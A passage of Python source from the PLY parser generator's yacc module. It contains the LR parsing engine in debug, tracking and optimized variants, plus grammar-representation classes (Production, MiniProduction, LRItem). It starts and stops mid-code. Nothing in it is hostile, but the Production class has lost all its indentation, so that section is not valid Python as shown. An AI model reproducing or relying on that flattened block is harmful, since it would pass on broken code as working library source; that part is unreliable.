        # Flatten multi-line reprs onto a single line by re-repr'ing.
        text = repr(text)
    if len(text) < 16:
        return text
    return "<%s @ 0x%x>" % (type(r).__name__, id(r))
#-----------------------------------------------------------------------------
# === LR Parsing Engine ===
#
# The following classes are used for the LR parser itself. These are not
# used during table construction and are independent of the actual LR
# table generation algorithm
#-----------------------------------------------------------------------------
# This class is used to hold non-terminal grammar symbols during parsing.
# It normally has the following attributes set:
# .type = Grammar symbol type
# .value = Symbol value
# .lineno = Starting line number
# .endlineno = Ending line number (optional, set automatically)
# .lexpos = Starting lex position
# .endlexpos = Ending lex position (optional, set automatically)
class YaccSymbol:
    """Holder for a grammar symbol on the parsing stack; the parser attaches
    .type/.value/.lineno/.lexpos (and end* variants) attributes dynamically."""
    def __str__(self): return self.type
    def __repr__(self): return str(self)
# This class is a wrapper around the objects actually passed to each
# grammar rule. Index lookup and assignment actually assign the
# .value attribute of the underlying YaccSymbol object.
# The lineno() method returns the line number of a given
# item (or 0 if not defined). The linespan() method returns
# a tuple of (startline,endline) representing the range of lines
# for a symbol. The lexspan() method returns a tuple (lexpos,endlexpos)
# representing the range of positional information for a symbol.
class YaccProduction:
    """Wrapper around the symbol objects handed to grammar rule functions.

    Index access reads/writes the ``.value`` of the underlying YaccSymbol;
    negative indices reach into the parser's symbol stack.  lineno()/
    linespan()/lexpos()/lexspan() expose positional information (0 when
    a symbol carries none).
    """
    def __init__(self, s, stack=None):
        self.slice = s
        self.stack = stack
        self.lexer = None
        self.parser = None

    def __getitem__(self, n):
        # Non-negative: rule slice; negative: reach below on the stack.
        target = self.slice if n >= 0 else self.stack
        return target[n].value

    def __setitem__(self, n, v):
        self.slice[n].value = v

    def __getslice__(self, i, j):
        # Python 2 slicing protocol.
        return [entry.value for entry in self.slice[i:j]]

    def __len__(self):
        return len(self.slice)

    def lineno(self, n):
        return getattr(self.slice[n], "lineno", 0)

    def set_lineno(self, n, lineno):
        self.slice[n].lineno = lineno

    def linespan(self, n):
        entry = self.slice[n]
        first = getattr(entry, "lineno", 0)
        return first, getattr(entry, "endlineno", first)

    def lexpos(self, n):
        return getattr(self.slice[n], "lexpos", 0)

    def lexspan(self, n):
        entry = self.slice[n]
        first = getattr(entry, "lexpos", 0)
        return first, getattr(entry, "endlexpos", first)

    def error(self):
        # Grammar rules call this to enter error recovery.
        raise SyntaxError
# -----------------------------------------------------------------------------
# == LRParser ==
#
# The LR Parsing engine.
# -----------------------------------------------------------------------------
class LRParser:
    """The LR parsing engine.  Drives the action/goto tables produced during
    grammar construction over a token stream."""
    def __init__(self,lrtab,errorf):
        # lrtab supplies the generated parse tables; errorf is the user's
        # p_error() handler (may be None).
        self.productions = lrtab.lr_productions
        self.action = lrtab.lr_action
        self.goto = lrtab.lr_goto
        self.errorfunc = errorf
    def errok(self):
        # Leave error-recovery mode (callable from user error handlers).
        self.errorok = 1
    def restart(self):
        # Reset both stacks back to the initial (0, $end) configuration.
        del self.statestack[:]
        del self.symstack[:]
        sym = YaccSymbol()
        sym.type = '$end'
        self.symstack.append(sym)
        self.statestack.append(0)
    def parse(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
        """Parse ``input`` and return the start symbol's value.

        Dispatches to one of three engine variants: the instrumented
        parsedebug(), position-tracking parseopt(), or the fully
        optimized parseopt_notrack().
        """
        if debug or yaccdevel:
            if isinstance(debug,int):
                debug = PlyLogger(sys.stderr)
            return self.parsedebug(input,lexer,debug,tracking,tokenfunc)
        elif tracking:
            return self.parseopt(input,lexer,debug,tracking,tokenfunc)
        else:
            return self.parseopt_notrack(input,lexer,debug,tracking,tokenfunc)
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# parsedebug().
#
# This is the debugging enabled version of parse(). All changes made to the
# parsing engine should be made here. For the non-debugging version,
# copy this code to a method parseopt() and delete all of the sections
# enclosed in:
#
# #--! DEBUG
# statements
# #--! DEBUG
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    def parsedebug(self,input=None,lexer=None,debug=None,tracking=0,tokenfunc=None):
        """Debug-instrumented parsing engine (the reference implementation).

        parseopt() and parseopt_notrack() below are hand-made copies of this
        method with the #--! DEBUG (and #--! TRACKING) sections removed, so
        any change made here must be mirrored there.
        """
        lookahead = None                 # Current lookahead symbol
        lookaheadstack = [ ]             # Stack of lookahead symbols
        actions = self.action            # Local reference to action table (to avoid lookup on self.)
        goto = self.goto                 # Local reference to goto table (to avoid lookup on self.)
        prod = self.productions          # Local reference to production list (to avoid lookup on self.)
        pslice = YaccProduction(None)    # Production object passed to grammar rules
        errorcount = 0                   # Used during error recovery
        # --! DEBUG
        debug.info("PLY: PARSE DEBUG START")
        # --! DEBUG
        # If no lexer was given, we will try to use the lex module
        if not lexer:
            lex = load_ply_lex()
            lexer = lex.lexer
        # Set up the lexer and parser objects on pslice
        pslice.lexer = lexer
        pslice.parser = self
        # If input was supplied, pass to lexer
        if input is not None:
            lexer.input(input)
        if tokenfunc is None:
            # Tokenize function
            get_token = lexer.token
        else:
            get_token = tokenfunc
        # Set up the state and symbol stacks
        statestack = [ ]                 # Stack of parsing states
        self.statestack = statestack
        symstack = [ ]                   # Stack of grammar symbols
        self.symstack = symstack
        pslice.stack = symstack          # Put in the production
        errtoken = None                  # Err token
        # The start state is assumed to be (0,$end)
        statestack.append(0)
        sym = YaccSymbol()
        sym.type = "$end"
        symstack.append(sym)
        state = 0
        while 1:
            # Get the next symbol on the input.  If a lookahead symbol
            # is already set, we just use that. Otherwise, we'll pull
            # the next token off of the lookaheadstack or from the lexer
            # --! DEBUG
            debug.debug('')
            debug.debug('State  : %s', state)
            # --! DEBUG
            if not lookahead:
                if not lookaheadstack:
                    lookahead = get_token()     # Get the next token
                else:
                    lookahead = lookaheadstack.pop()
                if not lookahead:
                    lookahead = YaccSymbol()
                    lookahead.type = "$end"
            # --! DEBUG
            debug.debug('Stack  : %s',
                        ("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip())
            # --! DEBUG
            # Check the action table
            ltype = lookahead.type
            t = actions[state].get(ltype)
            if t is not None:
                if t > 0:
                    # shift a symbol on the stack
                    statestack.append(t)
                    state = t
                    # --! DEBUG
                    debug.debug("Action : Shift and goto state %s", t)
                    # --! DEBUG
                    symstack.append(lookahead)
                    lookahead = None
                    # Decrease error count on successful shift
                    if errorcount: errorcount -=1
                    continue
                if t < 0:
                    # reduce a symbol on the stack, emit a production
                    p = prod[-t]
                    pname = p.name
                    plen = p.len
                    # Get production function
                    sym = YaccSymbol()
                    sym.type = pname       # Production name
                    sym.value = None
                    # --! DEBUG
                    if plen:
                        debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, "["+",".join([format_stack_entry(_v.value) for _v in symstack[-plen:]])+"]",-t)
                    else:
                        debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, [],-t)
                    # --! DEBUG
                    if plen:
                        targ = symstack[-plen-1:]
                        targ[0] = sym
                        # --! TRACKING
                        if tracking:
                            t1 = targ[1]
                            sym.lineno = t1.lineno
                            sym.lexpos = t1.lexpos
                            t1 = targ[-1]
                            sym.endlineno = getattr(t1,"endlineno",t1.lineno)
                            sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos)
                        # --! TRACKING
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # below as a performance optimization.  Make sure
                        # changes get made in both locations.
                        pslice.slice = targ
                        try:
                            # Call the grammar rule with our special slice object
                            del symstack[-plen:]
                            del statestack[-plen:]
                            p.callable(pslice)
                            # --! DEBUG
                            debug.info("Result : %s", format_result(pslice[0]))
                            # --! DEBUG
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                    else:
                        # --! TRACKING
                        if tracking:
                            sym.lineno = lexer.lineno
                            sym.lexpos = lexer.lexpos
                        # --! TRACKING
                        targ = [ sym ]
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # above as a performance optimization.  Make sure
                        # changes get made in both locations.
                        pslice.slice = targ
                        try:
                            # Call the grammar rule with our special slice object
                            p.callable(pslice)
                            # --! DEBUG
                            debug.info("Result : %s", format_result(pslice[0]))
                            # --! DEBUG
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                if t == 0:
                    n = symstack[-1]
                    result = getattr(n,"value",None)
                    # --! DEBUG
                    debug.info("Done   : Returning %s", format_result(result))
                    debug.info("PLY: PARSE DEBUG END")
                    # --! DEBUG
                    return result
            if t == None:
                # --! DEBUG
                debug.error('Error  : %s',
                            ("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip())
                # --! DEBUG
                # We have some kind of parsing error here.  To handle
                # this, we are going to push the current token onto
                # the tokenstack and replace it with an 'error' token.
                # If there are any synchronization rules, they may
                # catch it.
                #
                # In addition to pushing the error token, we call call
                # the user defined p_error() function if this is the
                # first syntax error.  This function is only called if
                # errorcount == 0.
                if errorcount == 0 or self.errorok:
                    errorcount = error_count
                    self.errorok = 0
                    errtoken = lookahead
                    if errtoken.type == "$end":
                        errtoken = None               # End of file!
                    if self.errorfunc:
                        global errok,token,restart
                        errok = self.errok        # Set some special functions available in error recovery
                        token = get_token
                        restart = self.restart
                        if errtoken and not hasattr(errtoken,'lexer'):
                            errtoken.lexer = lexer
                        tok = self.errorfunc(errtoken)
                        del errok, token, restart   # Delete special functions
                        if self.errorok:
                            # User must have done some kind of panic
                            # mode recovery on their own.  The
                            # returned token is the next lookahead
                            lookahead = tok
                            errtoken = None
                            continue
                    else:
                        if errtoken:
                            if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
                            else: lineno = 0
                            if lineno:
                                sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
                            else:
                                sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
                        else:
                            sys.stderr.write("yacc: Parse error in input. EOF\n")
                        return
                else:
                    errorcount = error_count
                # case 1:  the statestack only has 1 entry on it.  If we're in this state, the
                # entire parse has been rolled back and we're completely hosed.   The token is
                # discarded and we just keep going.
                if len(statestack) <= 1 and lookahead.type != "$end":
                    lookahead = None
                    errtoken = None
                    state = 0
                    # Nuke the pushback stack
                    del lookaheadstack[:]
                    continue
                # case 2: the statestack has a couple of entries on it, but we're
                # at the end of the file. nuke the top entry and generate an error token
                # Start nuking entries on the stack
                if lookahead.type == "$end":
                    # Whoa. We're really hosed here. Bail out
                    return
                if lookahead.type != 'error':
                    sym = symstack[-1]
                    if sym.type == 'error':
                        # Hmmm. Error is on top of stack, we'll just nuke input
                        # symbol and continue
                        lookahead = None
                        continue
                    t = YaccSymbol()
                    t.type = 'error'
                    if hasattr(lookahead,"lineno"):
                        t.lineno = lookahead.lineno
                    t.value = lookahead
                    lookaheadstack.append(lookahead)
                    lookahead = t
                else:
                    symstack.pop()
                    statestack.pop()
                    state = statestack[-1]       # Potential bug fix
                continue
            # Call an error function here
            raise RuntimeError("yacc: internal parser error!!!\n")
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# parseopt().
#
# Optimized version of parse() method. DO NOT EDIT THIS CODE DIRECTLY.
# Edit the debug version above, then copy any modifications to the method
# below while removing #--! DEBUG sections.
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    def parseopt(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
        """Optimized engine with position tracking.

        DO NOT EDIT THIS CODE DIRECTLY: it is a hand-made copy of
        parsedebug() with the #--! DEBUG sections removed.  Edit the debug
        version above and re-copy any modifications here.
        """
        lookahead = None                 # Current lookahead symbol
        lookaheadstack = [ ]             # Stack of lookahead symbols
        actions = self.action            # Local reference to action table (to avoid lookup on self.)
        goto = self.goto                 # Local reference to goto table (to avoid lookup on self.)
        prod = self.productions          # Local reference to production list (to avoid lookup on self.)
        pslice = YaccProduction(None)    # Production object passed to grammar rules
        errorcount = 0                   # Used during error recovery
        # If no lexer was given, we will try to use the lex module
        if not lexer:
            lex = load_ply_lex()
            lexer = lex.lexer
        # Set up the lexer and parser objects on pslice
        pslice.lexer = lexer
        pslice.parser = self
        # If input was supplied, pass to lexer
        if input is not None:
            lexer.input(input)
        if tokenfunc is None:
            # Tokenize function
            get_token = lexer.token
        else:
            get_token = tokenfunc
        # Set up the state and symbol stacks
        statestack = [ ]                 # Stack of parsing states
        self.statestack = statestack
        symstack = [ ]                   # Stack of grammar symbols
        self.symstack = symstack
        pslice.stack = symstack          # Put in the production
        errtoken = None                  # Err token
        # The start state is assumed to be (0,$end)
        statestack.append(0)
        sym = YaccSymbol()
        sym.type = '$end'
        symstack.append(sym)
        state = 0
        while 1:
            # Get the next symbol on the input.  If a lookahead symbol
            # is already set, we just use that. Otherwise, we'll pull
            # the next token off of the lookaheadstack or from the lexer
            if not lookahead:
                if not lookaheadstack:
                    lookahead = get_token()     # Get the next token
                else:
                    lookahead = lookaheadstack.pop()
                if not lookahead:
                    lookahead = YaccSymbol()
                    lookahead.type = '$end'
            # Check the action table
            ltype = lookahead.type
            t = actions[state].get(ltype)
            if t is not None:
                if t > 0:
                    # shift a symbol on the stack
                    statestack.append(t)
                    state = t
                    symstack.append(lookahead)
                    lookahead = None
                    # Decrease error count on successful shift
                    if errorcount: errorcount -=1
                    continue
                if t < 0:
                    # reduce a symbol on the stack, emit a production
                    p = prod[-t]
                    pname = p.name
                    plen = p.len
                    # Get production function
                    sym = YaccSymbol()
                    sym.type = pname       # Production name
                    sym.value = None
                    if plen:
                        targ = symstack[-plen-1:]
                        targ[0] = sym
                        # --! TRACKING
                        if tracking:
                            t1 = targ[1]
                            sym.lineno = t1.lineno
                            sym.lexpos = t1.lexpos
                            t1 = targ[-1]
                            sym.endlineno = getattr(t1,"endlineno",t1.lineno)
                            sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos)
                        # --! TRACKING
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # below as a performance optimization.  Make sure
                        # changes get made in both locations.
                        pslice.slice = targ
                        try:
                            # Call the grammar rule with our special slice object
                            del symstack[-plen:]
                            del statestack[-plen:]
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                    else:
                        # --! TRACKING
                        if tracking:
                            sym.lineno = lexer.lineno
                            sym.lexpos = lexer.lexpos
                        # --! TRACKING
                        targ = [ sym ]
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # above as a performance optimization.  Make sure
                        # changes get made in both locations.
                        pslice.slice = targ
                        try:
                            # Call the grammar rule with our special slice object
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                if t == 0:
                    n = symstack[-1]
                    return getattr(n,"value",None)
            if t == None:
                # We have some kind of parsing error here.  To handle
                # this, we are going to push the current token onto
                # the tokenstack and replace it with an 'error' token.
                # If there are any synchronization rules, they may
                # catch it.
                #
                # In addition to pushing the error token, we call call
                # the user defined p_error() function if this is the
                # first syntax error.  This function is only called if
                # errorcount == 0.
                if errorcount == 0 or self.errorok:
                    errorcount = error_count
                    self.errorok = 0
                    errtoken = lookahead
                    if errtoken.type == '$end':
                        errtoken = None               # End of file!
                    if self.errorfunc:
                        global errok,token,restart
                        errok = self.errok        # Set some special functions available in error recovery
                        token = get_token
                        restart = self.restart
                        if errtoken and not hasattr(errtoken,'lexer'):
                            errtoken.lexer = lexer
                        tok = self.errorfunc(errtoken)
                        del errok, token, restart   # Delete special functions
                        if self.errorok:
                            # User must have done some kind of panic
                            # mode recovery on their own.  The
                            # returned token is the next lookahead
                            lookahead = tok
                            errtoken = None
                            continue
                    else:
                        if errtoken:
                            if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
                            else: lineno = 0
                            if lineno:
                                sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
                            else:
                                sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
                        else:
                            sys.stderr.write("yacc: Parse error in input. EOF\n")
                        return
                else:
                    errorcount = error_count
                # case 1:  the statestack only has 1 entry on it.  If we're in this state, the
                # entire parse has been rolled back and we're completely hosed.   The token is
                # discarded and we just keep going.
                if len(statestack) <= 1 and lookahead.type != '$end':
                    lookahead = None
                    errtoken = None
                    state = 0
                    # Nuke the pushback stack
                    del lookaheadstack[:]
                    continue
                # case 2: the statestack has a couple of entries on it, but we're
                # at the end of the file. nuke the top entry and generate an error token
                # Start nuking entries on the stack
                if lookahead.type == '$end':
                    # Whoa. We're really hosed here. Bail out
                    return
                if lookahead.type != 'error':
                    sym = symstack[-1]
                    if sym.type == 'error':
                        # Hmmm. Error is on top of stack, we'll just nuke input
                        # symbol and continue
                        lookahead = None
                        continue
                    t = YaccSymbol()
                    t.type = 'error'
                    if hasattr(lookahead,"lineno"):
                        t.lineno = lookahead.lineno
                    t.value = lookahead
                    lookaheadstack.append(lookahead)
                    lookahead = t
                else:
                    symstack.pop()
                    statestack.pop()
                    state = statestack[-1]       # Potential bug fix
                continue
            # Call an error function here
            raise RuntimeError("yacc: internal parser error!!!\n")
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# parseopt_notrack().
#
# Optimized version of parseopt() with line number tracking removed.
# DO NOT EDIT THIS CODE DIRECTLY. Copy the optimized version and remove
# code in the #--! TRACKING sections
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    def parseopt_notrack(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
        """Fully optimized engine: parseopt() with line-number tracking removed.

        DO NOT EDIT THIS CODE DIRECTLY: copy the optimized version above and
        strip the #--! TRACKING sections.
        """
        lookahead = None                 # Current lookahead symbol
        lookaheadstack = [ ]             # Stack of lookahead symbols
        actions = self.action            # Local reference to action table (to avoid lookup on self.)
        goto = self.goto                 # Local reference to goto table (to avoid lookup on self.)
        prod = self.productions          # Local reference to production list (to avoid lookup on self.)
        pslice = YaccProduction(None)    # Production object passed to grammar rules
        errorcount = 0                   # Used during error recovery
        # If no lexer was given, we will try to use the lex module
        if not lexer:
            lex = load_ply_lex()
            lexer = lex.lexer
        # Set up the lexer and parser objects on pslice
        pslice.lexer = lexer
        pslice.parser = self
        # If input was supplied, pass to lexer
        if input is not None:
            lexer.input(input)
        if tokenfunc is None:
            # Tokenize function
            get_token = lexer.token
        else:
            get_token = tokenfunc
        # Set up the state and symbol stacks
        statestack = [ ]                 # Stack of parsing states
        self.statestack = statestack
        symstack = [ ]                   # Stack of grammar symbols
        self.symstack = symstack
        pslice.stack = symstack          # Put in the production
        errtoken = None                  # Err token
        # The start state is assumed to be (0,$end)
        statestack.append(0)
        sym = YaccSymbol()
        sym.type = '$end'
        symstack.append(sym)
        state = 0
        while 1:
            # Get the next symbol on the input.  If a lookahead symbol
            # is already set, we just use that. Otherwise, we'll pull
            # the next token off of the lookaheadstack or from the lexer
            if not lookahead:
                if not lookaheadstack:
                    lookahead = get_token()     # Get the next token
                else:
                    lookahead = lookaheadstack.pop()
                if not lookahead:
                    lookahead = YaccSymbol()
                    lookahead.type = '$end'
            # Check the action table
            ltype = lookahead.type
            t = actions[state].get(ltype)
            if t is not None:
                if t > 0:
                    # shift a symbol on the stack
                    statestack.append(t)
                    state = t
                    symstack.append(lookahead)
                    lookahead = None
                    # Decrease error count on successful shift
                    if errorcount: errorcount -=1
                    continue
                if t < 0:
                    # reduce a symbol on the stack, emit a production
                    p = prod[-t]
                    pname = p.name
                    plen = p.len
                    # Get production function
                    sym = YaccSymbol()
                    sym.type = pname       # Production name
                    sym.value = None
                    if plen:
                        targ = symstack[-plen-1:]
                        targ[0] = sym
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # below as a performance optimization.  Make sure
                        # changes get made in both locations.
                        pslice.slice = targ
                        try:
                            # Call the grammar rule with our special slice object
                            del symstack[-plen:]
                            del statestack[-plen:]
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                    else:
                        targ = [ sym ]
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # above as a performance optimization.  Make sure
                        # changes get made in both locations.
                        pslice.slice = targ
                        try:
                            # Call the grammar rule with our special slice object
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                if t == 0:
                    n = symstack[-1]
                    return getattr(n,"value",None)
            if t == None:
                # We have some kind of parsing error here.  To handle
                # this, we are going to push the current token onto
                # the tokenstack and replace it with an 'error' token.
                # If there are any synchronization rules, they may
                # catch it.
                #
                # In addition to pushing the error token, we call call
                # the user defined p_error() function if this is the
                # first syntax error.  This function is only called if
                # errorcount == 0.
                if errorcount == 0 or self.errorok:
                    errorcount = error_count
                    self.errorok = 0
                    errtoken = lookahead
                    if errtoken.type == '$end':
                        errtoken = None               # End of file!
                    if self.errorfunc:
                        global errok,token,restart
                        errok = self.errok        # Set some special functions available in error recovery
                        token = get_token
                        restart = self.restart
                        if errtoken and not hasattr(errtoken,'lexer'):
                            errtoken.lexer = lexer
                        tok = self.errorfunc(errtoken)
                        del errok, token, restart   # Delete special functions
                        if self.errorok:
                            # User must have done some kind of panic
                            # mode recovery on their own.  The
                            # returned token is the next lookahead
                            lookahead = tok
                            errtoken = None
                            continue
                    else:
                        if errtoken:
                            if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
                            else: lineno = 0
                            if lineno:
                                sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
                            else:
                                sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
                        else:
                            sys.stderr.write("yacc: Parse error in input. EOF\n")
                        return
                else:
                    errorcount = error_count
                # case 1:  the statestack only has 1 entry on it.  If we're in this state, the
                # entire parse has been rolled back and we're completely hosed.   The token is
                # discarded and we just keep going.
                if len(statestack) <= 1 and lookahead.type != '$end':
                    lookahead = None
                    errtoken = None
                    state = 0
                    # Nuke the pushback stack
                    del lookaheadstack[:]
                    continue
                # case 2: the statestack has a couple of entries on it, but we're
                # at the end of the file. nuke the top entry and generate an error token
                # Start nuking entries on the stack
                if lookahead.type == '$end':
                    # Whoa. We're really hosed here. Bail out
                    return
                if lookahead.type != 'error':
                    sym = symstack[-1]
                    if sym.type == 'error':
                        # Hmmm. Error is on top of stack, we'll just nuke input
                        # symbol and continue
                        lookahead = None
                        continue
                    t = YaccSymbol()
                    t.type = 'error'
                    if hasattr(lookahead,"lineno"):
                        t.lineno = lookahead.lineno
                    t.value = lookahead
                    lookaheadstack.append(lookahead)
                    lookahead = t
                else:
                    symstack.pop()
                    statestack.pop()
                    state = statestack[-1]       # Potential bug fix
                continue
            # Call an error function here
            raise RuntimeError("yacc: internal parser error!!!\n")
# -----------------------------------------------------------------------------
# === Grammar Representation ===
#
# The following functions, classes, and variables are used to represent and
# manipulate the rules that make up a grammar.
# -----------------------------------------------------------------------------
import re

# regex matching identifiers
# NOTE(review): this pattern also accepts '-' inside names; confirm that
# hyphenated rule/token names are intentional before tightening it.
_is_identifier = re.compile(r'^[a-zA-Z0-9_-]+$')
# -----------------------------------------------------------------------------
# class Production:
#
# This class stores the raw information about a single production or grammar rule.
# A grammar rule refers to a specification such as this:
#
# expr : expr PLUS term
#
# Here are the basic attributes defined on all productions
#
# name - Name of the production. For example 'expr'
# prod - A list of symbols on the right side ['expr','PLUS','term']
# prec - Production precedence level
# number - Production number.
# func - Function that executes on reduce
# file - File where production function is defined
# lineno - Line number where production function is defined
#
# The following attributes are defined or optional.
#
# len - Length of the production (number of symbols on right hand side)
# usyms - Set of unique symbols found in the production
# -----------------------------------------------------------------------------
class Production(object):
reduced = 0
def __init__(self,number,name,prod,precedence=('right',0),func=None,file='',line=0):
self.name = name
self.prod = tuple(prod)
self.number = number
self.func = func
self.callable = None
self.file = file
self.line = line
self.prec = precedence
# Internal settings used during table construction
self.len = len(self.prod) # Length of the production
# Create a list of unique production symbols used in the production
self.usyms = [ ]
for s in self.prod:
if s not in self.usyms:
self.usyms.append(s)
# List of all LR items for the production
self.lr_items = []
self.lr_next = None
# Create a string representation
if self.prod:
self.str = "%s -> %s" % (self.name," ".join(self.prod))
else:
self.str = "%s -> <empty>" % self.name
def __str__(self):
return self.str
def __repr__(self):
return "Production("+str(self)+")"
def __len__(self):
return len(self.prod)
def __nonzero__(self):
return 1
def __getitem__(self,index):
return self.prod[index]
# Return the nth lr_item from the production (or None if at the end)
def lr_item(self,n):
if n > len(self.prod): return None
p = LRItem(self,n)
# Precompute the list of productions immediately following. Hack. Remove later
try:
p.lr_after = Prodnames[p.prod[n+1]]
except (IndexError,KeyError):
p.lr_after = []
try:
p.lr_before = p.prod[n-1]
except IndexError:
p.lr_before = None
return p
# Bind the production function name to a callable
def bind(self,pdict):
if self.func:
self.callable = pdict[self.func]
# This class serves as a minimal standin for Production objects when
# reading table data from files. It only contains information
# actually used by the LR parsing engine, plus some additional
# debugging information.
class MiniProduction(object):
    """Lightweight stand-in for Production when tables are read from files.

    Carries only the fields the LR parsing engine actually uses at run
    time, plus a little debugging information.
    """
    def __init__(self,str,name,len,func,file,line):
        # Parameter names shadow builtins; kept for table-file compatibility.
        self.str      = str
        self.name     = name
        self.len      = len
        self.func     = func
        self.file     = file
        self.line     = line
        self.callable = None
    def __str__(self):
        return self.str
    def __repr__(self):
        return "MiniProduction(%s)" % self.str
    # Resolve self.func (a function name) to the actual callable in pdict.
    def bind(self,pdict):
        if self.func:
            self.callable = pdict[self.func]
# -----------------------------------------------------------------------------
# class LRItem
#
# This class represents a specific stage of parsing a production rule. For
# example:
#
# expr : expr . PLUS term
#
# In the above, the "." represents the current location of the parse. Here
# basic attributes:
#
# name - Name of the production. For example 'expr'
# prod - A list of symbols on the right side ['expr','.', 'PLUS','term']
# number - Production number.
#
# lr_next Next LR item. Example, if we are ' expr -> expr . PLUS term'
# then lr_next refers to 'expr -> expr PLUS . term'
# lr_index - LR item index (location of the ".") in the prod list.
# lookaheads - LALR lookahead symbols for this item
# len - Length of the production (number of symbols on right hand side)
# lr_after - List of all productions that immediately follow
# lr_before - Grammar symbol immediately before
# -----------------------------------------------------------------------------
class LRItem(object):
    """One parsing stage of a production, with '.' marking the position.

    For example 'expr -> expr . PLUS term'.  See the banner comment above
    for attribute descriptions; lookaheads is filled in during LALR
    lookahead computation.
    """
    def __init__(self,p,n):
        self.name       = p.name
        self.number     = p.number
        self.lr_index   = n
        self.lookaheads = { }
        self.usyms      = p.usyms
        # Splice the dot into a copy of the right-hand side at position n.
        rhs = list(p.prod)
        rhs.insert(n,".")
